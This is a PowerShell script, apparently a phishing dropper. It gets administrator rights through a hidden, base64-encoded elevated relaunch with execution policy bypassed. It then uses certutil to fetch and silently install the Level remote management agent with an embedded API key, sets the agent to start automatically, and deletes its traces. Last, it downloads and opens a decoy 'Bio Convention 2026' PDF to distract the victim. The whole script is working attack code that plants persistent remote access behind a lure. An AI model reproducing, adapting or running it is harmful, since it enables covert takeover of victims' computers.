# Check for admin privileges and elevate if needed
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    $scriptContent = @"
`$levelApiKey = "LEVEL_API_KEY=CUMHxGLc1pG31otXDEeiCRKg";
`$tempFile = Join-Path ([System.IO.Path]::GetTempPath()) "level.msi";
cmd /c certutil -urlcache -f https://downloads.level.io/level.msi `$tempFile;
`$batFile = Join-Path ([System.IO.Path]::GetTempPath()) "install.bat";
`"@echo off`r`nmsiexec.exe /i ``"`$tempFile``" `$levelApiKey /qn >nul 2>&1`r`nsc start Level`r`nsc config Level start= auto`" | Out-File -FilePath `$batFile -Encoding ASCII;
`$psi = New-Object System.Diagnostics.ProcessStartInfo;
`$psi.FileName = `$batFile;
`$psi.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden;
`$psi.CreateNoWindow = `$true;
`$psi.UseShellExecute = `$false;
`$process = New-Object System.Diagnostics.Process;
`$process.StartInfo = `$psi;
`$process.Start() | Out-Null;
`$process.WaitForExit();
Remove-Item `$batFile -Force -ErrorAction SilentlyContinue;
Start-Sleep -Seconds 2;
`$pdfUrl = 'https://raw.githubusercontent.com/zizilgtm/cse3100-Project/main/Bio_Convention_2026_Korea_Bilingual.pdf';
`$pdfFile = Join-Path ([System.IO.Path]::GetTempPath()) 'Bio_Convention_2026.pdf';
cmd /c certutil -urlcache -f `$pdfUrl `$pdfFile;
Start-Process `$pdfFile;
"@
    $encodedScript = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($scriptContent))
    Start-Process powershell.exe -Verb RunAs -ArgumentList "-NoP -NonI -W Hidden -Exec Bypass -Enc $encodedScript" -Wait
    exit
}

# Execute payload as administrator
$levelApiKey = "LEVEL_API_KEY=CUMHxGLc1pG31otXDEeiCRKg";
$tempFile = Join-Path ([System.IO.Path]::GetTempPath()) "level.msi";
cmd /c certutil -urlcache -f https://downloads.level.io/level.msi $tempFile;
$batFile = Join-Path ([System.IO.Path]::GetTempPath()) "install.bat";
"@echo off`r`nmsiexec.exe /i `"$tempFile`" $levelApiKey /qn >nul 2>&1`r`nsc start Level`r`nsc config Level start= auto" | Out-File -FilePath $batFile -Encoding ASCII;
$psi = New-Object System.Diagnostics.ProcessStartInfo;
$psi.FileName = $batFile;
$psi.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden;
$psi.CreateNoWindow = $true;
$psi.UseShellExecute = $false;
$process = New-Object System.Diagnostics.Process;
$process.StartInfo = $psi;
$process.Start() | Out-Null;
$process.WaitForExit();
Remove-Item $batFile -Force -ErrorAction SilentlyContinue;
Start-Sleep -Seconds 2;
$pdfUrl = 'https://raw.githubusercontent.com/zizilgtm/cse3100-Project/main/Bio_Convention_2026_Korea_Bilingual.pdf';
$pdfFile = Join-Path ([System.IO.Path]::GetTempPath()) 'Bio_Convention_2026.pdf';
cmd /c certutil -urlcache -f $pdfUrl $pdfFile;
Start-Process $pdfFile;
